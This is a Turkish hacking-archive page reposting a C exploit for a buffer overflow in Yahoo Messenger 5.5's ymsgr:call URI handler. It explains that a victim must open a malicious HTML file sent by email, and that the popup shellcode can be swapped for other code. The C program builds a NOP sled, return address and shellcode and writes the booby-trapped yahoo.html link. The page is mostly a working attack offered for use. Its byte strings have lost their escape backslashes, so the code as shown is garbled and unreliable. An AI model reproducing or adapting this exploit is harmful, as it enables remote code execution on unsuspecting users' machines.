Aradıgın herşey burda HvLi.tr.gg

Yh

Bu exploit aşağıdaki programlarda test edilmiştir:
* Yahoo Messenger 5,5,0,1246
* Yahoo Module 5,5,0,454

Windows 2000 Professional 5.0.2195 SP3 içindir.

Ravedtors.net bunun bir Windows versiyonun yayımlamıştır.

Exploit Windows XP Pro SP1 içindir

Bu yüzden her iki hedef de XP/2k·ya açıktır. Bazı adreslerin değişmesi gerekebilir.
Oluşabilecek sorunlar:

Kullanılan adres kutudan kutuya değişiyor olabilir. Bu yüzden değişmeleri gerekebilir.

Yığın iskelet kodu adresinin değişmesini koruyor olabilir. Alternatifi olmayan, değişmeyen bir sektöre ulaşacaksınız.
İki çakışma var. Birisi bypass. Bu taşınamaz birime tecavüz etmekç Diğer çakılma ise taşınmaz birimde olduğumuz aman. Bu yüzden ikincisini karıştırmayın.

Burada kullanılan kabuk kod kötü niyetli değilidr. Sadece bir popup açar. Bu kodu değiştirebilirsiniz. Ama tampon çok büyük değil. Bu yüzden birleşik kabuk imkanı yok.

Bu exploit kurbanda uzaktan verilen komutu çalıştırmaya yarar. Yalın olarak mantık URI yönetimidir. Ve kurban kötü html dosyasını görmelidir. Bu otomatik olarak e-posta yoluyla yapılabilir.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MessageBoxA "x1dx97x53x01"


char ret[8]= "xD5x96x7Ax01";


unsigned char win32_msgbox[] = {
"xEBx19x5Ex33xC9x89x4Ex05xB8" MessageBoxA "x2Dx01x01"
"x01x01x8Bx18x6Ax10x56x56x51xFFxD3xE8xE2xFFxFFxFF"
"x62x6fx62xffx00x00x00x00x00x00x00x00x00x00x00x00"
};


int main(int argc,char *argv[])
{
FILE *evil;
char *shellcode = win32_msgbox;
unsigned char buffer[5000];
int offset=320;


fprintf(stdout, "ntYahPoo.c By bob.n");
fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5n");
fprintf(stdout, "tDSR-[www.dtors.net]-DSRnn");


fprintf(stdout,"Makin da EbUL HTML File... ");
if ((evil =fopen("yahoo.html","w"))==NULL){
fprintf(stderr,"Failedn");
exit(1);
} else {
fprintf(stderr,"Opened!n");
}

 

 

memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);


memcpy(buffer+offset,ret,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode));


buffer[264] = 0xD4; //address of &shellcode
buffer[265] = 0x96;
buffer[266] = 0x7A;
buffer[267] = 0x01;

buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll]
buffer[273] = 0x01;
buffer[274] = 0x01;
buffer[275] = 0x78;


fprintf(evil,"<html>");
fprintf(evil,"<title>Bought to you by dtors.net!</title>n");
fprintf(evil,"<B>Dtors Security Research (DSR)</B>n");
fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>n");
fprintf(evil,"<pre>");
fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></bOdy></pre></html>x00x00x00",0x22,buffer,0x22);
fclose(evil); // <-- closing yahoo.html

fprintf(stdout,"nDa ebUL HTML file is >>yahoo.html<<nEnjoy!nwww.dtors.netnn");
}

Bugün 34 ziyaretçi (39 klik) kişi burdaydı!
_________________________________________
Merhaba  IP adresin 3.129.247.196
Copyright ©hvli.tr.gg
Eğer yasal bi savaş istemiyorsan..Site tasarımından içerikden ctrl+c den UZAK dur..

Hack arşivi